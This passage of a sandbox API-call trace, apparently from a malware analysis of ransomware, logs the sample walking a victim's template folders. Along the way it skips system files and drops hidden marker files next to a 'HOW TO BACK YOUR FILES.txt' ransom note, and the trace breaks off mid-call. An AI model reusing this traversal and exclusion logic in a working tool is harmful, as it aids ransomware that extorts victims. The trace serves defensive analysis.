1 [0052.442] lstrcmpiW (lpString1="Managed", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.442] lstrcmpiW (lpString1="Managed", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.442] lstrcmpiW (lpString1="Managed", lpString2="Rabbit4444.exe") returned -1 [0052.442] lstrcmpiW (lpString1="Managed", lpString2=".") returned 1 [0052.442] lstrcmpiW (lpString1="Managed", lpString2="..") returned 1 [0052.442] lstrcmpiW (lpString1="Managed", lpString2="windows") returned -1 [0052.442] lstrcmpiW (lpString1="Managed", lpString2="bootmgr") returned 1 [0052.442] lstrcmpiW (lpString1="Managed", lpString2="pagefile.sys") returned -1 [0052.442] lstrcmpiW (lpString1="Managed", lpString2="boot") returned 1 [0052.442] lstrcmpiW (lpString1="Managed", lpString2="ids.txt") returned 1 [0052.442] lstrcmpiW (lpString1="Managed", lpString2="NTUSER.DAT") returned -1 [0052.442] lstrcpyW (in: lpString1=0x130ebbe, lpString2="Managed" | out: lpString1="Managed") returned="Managed" [0052.442] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x120770 [0052.442] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x96) returned 0x1139b8 [0052.442] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x120778 | out: ListHead=0xf68b0, ListEntry=0x120778) returned 0x120538 [0052.442] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="User", cAlternateFileName="")) returned 1 [0052.442] lstrcmpiW (lpString1="User", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.442] lstrcmpiW (lpString1="User", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.442] lstrcmpiW (lpString1="User", lpString2="Rabbit4444.exe") returned 1 [0052.442] lstrcmpiW (lpString1="User", lpString2=".") returned 1 [0052.442] lstrcmpiW (lpString1="User", lpString2="..") returned 1 [0052.442] lstrcmpiW (lpString1="User", lpString2="windows") returned -1 [0052.442] lstrcmpiW (lpString1="User", lpString2="bootmgr") returned 1 [0052.442] lstrcmpiW (lpString1="User", lpString2="pagefile.sys") returned 1 [0052.442] lstrcmpiW (lpString1="User", lpString2="boot") returned 1 [0052.442] lstrcmpiW (lpString1="User", lpString2="ids.txt") returned 1 [0052.442] lstrcmpiW (lpString1="User", lpString2="NTUSER.DAT") returned 1 [0052.442] lstrcpyW (in: lpString1=0x130ebbe, lpString2="User" | out: lpString1="User") returned="User" [0052.442] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1207b0 [0052.442] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x90) returned 0x11eb98 [0052.442] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1207b8 | out: ListHead=0xf68b0, ListEntry=0x1207b8) returned 0x120778 [0052.442] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="User", cAlternateFileName="")) returned 0 [0052.442] FindClose (in: hFindFile=0x102810 | out: hFindFile=0x102810) returned 1 [0052.443] lstrcpyW (in: lpString1=0x130ebbe, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.443] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.443] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.443] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.443] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.443] CloseHandle (hObject=0x278) returned 1 [0052.443] CloseHandle (hObject=0x27c) returned 1 [0052.443] GetCurrentThreadId () returned 0xd98 [0052.443] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1207b8 [0052.443] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User" [0052.443] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11eb98 | out: hHeap=0xe0000) returned 1 [0052.443] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1207b0 | out: hHeap=0xe0000) returned 1 [0052.444] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User" [0052.444] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\" [0052.444] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\.BFC0E91B00AE8A0620D3" [0052.444] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.445] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.448] FlushFileBuffers (hFile=0x27c) returned 1 [0052.448] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.448] CloseHandle (hObject=0x27c) returned 1 [0052.449] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User") returned 71 [0052.449] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.449] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe89543cb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0052.449] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.449] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.449] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.449] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.449] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe89543cb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.449] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.449] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.449] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.449] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.449] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.449] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe89543cb, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe89543cb, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe89543cb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.449] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.449] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.449] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Document Themes", cAlternateFileName="DOCUME~1")) returned 1 [0052.450] lstrcmpiW (lpString1="Document Themes", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.450] lstrcmpiW (lpString1="Document Themes", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.450] lstrcmpiW (lpString1="Document Themes", lpString2="Rabbit4444.exe") returned -1 [0052.450] lstrcmpiW (lpString1="Document Themes", lpString2=".") returned 1 [0052.450] lstrcmpiW (lpString1="Document Themes", lpString2="..") returned 1 [0052.450] lstrcmpiW (lpString1="Document Themes", lpString2="windows") returned -1 [0052.450] lstrcmpiW (lpString1="Document Themes", lpString2="bootmgr") returned 1 [0052.450] lstrcmpiW (lpString1="Document Themes", lpString2="pagefile.sys") returned -1 [0052.450] lstrcmpiW (lpString1="Document Themes", lpString2="boot") returned 1 [0052.450] lstrcmpiW (lpString1="Document Themes", lpString2="ids.txt") returned -1 [0052.450] lstrcmpiW (lpString1="Document Themes", lpString2="NTUSER.DAT") returned -1 [0052.450] lstrcpyW (in: lpString1=0x130ebc8, lpString2="Document Themes" | out: lpString1="Document Themes") returned="Document Themes" [0052.450] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x120870 [0052.450] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb0) returned 0xefd18 [0052.450] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x120878 | out: ListHead=0xf68b0, ListEntry=0x120878) returned 0x120778 [0052.450] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Document Themes", cAlternateFileName="DOCUME~1")) returned 0 [0052.450] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0052.450] lstrcpyW (in: lpString1=0x130ebc8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.450] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.452] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.452] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.452] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.452] CloseHandle (hObject=0x278) returned 1 [0052.452] CloseHandle (hObject=0x27c) returned 1 [0052.452] GetCurrentThreadId () returned 0xd98 [0052.453] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x120878 [0052.453] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes" [0052.453] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xefd18 | out: hHeap=0xe0000) returned 1 [0052.453] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120870 | out: hHeap=0xe0000) returned 1 [0052.453] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes" [0052.453] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\" [0052.453] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\.BFC0E91B00AE8A0620D3" [0052.453] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\document themes\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.459] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.461] FlushFileBuffers (hFile=0x27c) returned 1 [0052.462] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.462] CloseHandle (hObject=0x27c) returned 1 [0052.463] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes") returned 87 [0052.463] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.463] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe897852b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0052.463] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.463] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.463] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.463] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.463] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe897852b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.463] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.463] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.463] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.463] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.463] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.463] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe897852b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe897852b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe897852b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.463] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.463] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.463] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0052.463] lstrcmpiW (lpString1="1033", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.463] lstrcmpiW (lpString1="1033", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.463] lstrcmpiW (lpString1="1033", lpString2="Rabbit4444.exe") returned -1 [0052.464] lstrcmpiW (lpString1="1033", lpString2=".") returned 1 [0052.464] lstrcmpiW (lpString1="1033", lpString2="..") returned 1 [0052.464] lstrcmpiW (lpString1="1033", lpString2="windows") returned -1 [0052.464] lstrcmpiW (lpString1="1033", lpString2="bootmgr") returned -1 [0052.464] lstrcmpiW (lpString1="1033", lpString2="pagefile.sys") returned -1 [0052.464] lstrcmpiW (lpString1="1033", lpString2="boot") returned -1 [0052.464] lstrcmpiW (lpString1="1033", lpString2="ids.txt") returned -1 [0052.464] lstrcmpiW (lpString1="1033", lpString2="NTUSER.DAT") returned -1 [0052.464] lstrcpyW (in: lpString1=0x130ebe8, lpString2="1033" | out: lpString1="1033") returned="1033" [0052.464] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x120550 [0052.464] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xba) returned 0xefd18 [0052.464] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x120558 | out: ListHead=0xf68b0, ListEntry=0x120558) returned 0x120778 [0052.464] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0052.464] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0052.464] lstrcpyW (in: lpString1=0x130ebe8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.464] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\document themes\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.466] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.466] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.466] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.467] CloseHandle (hObject=0x278) returned 1 [0052.467] CloseHandle (hObject=0x27c) returned 1 [0052.467] GetCurrentThreadId () returned 0xd98 [0052.467] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x120558 [0052.467] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033" [0052.467] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xefd18 | out: hHeap=0xe0000) returned 1 [0052.467] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120550 | out: hHeap=0xe0000) returned 1 [0052.467] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033" [0052.467] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\" [0052.467] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\.BFC0E91B00AE8A0620D3" [0052.467] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\document themes\\1033\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.468] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: 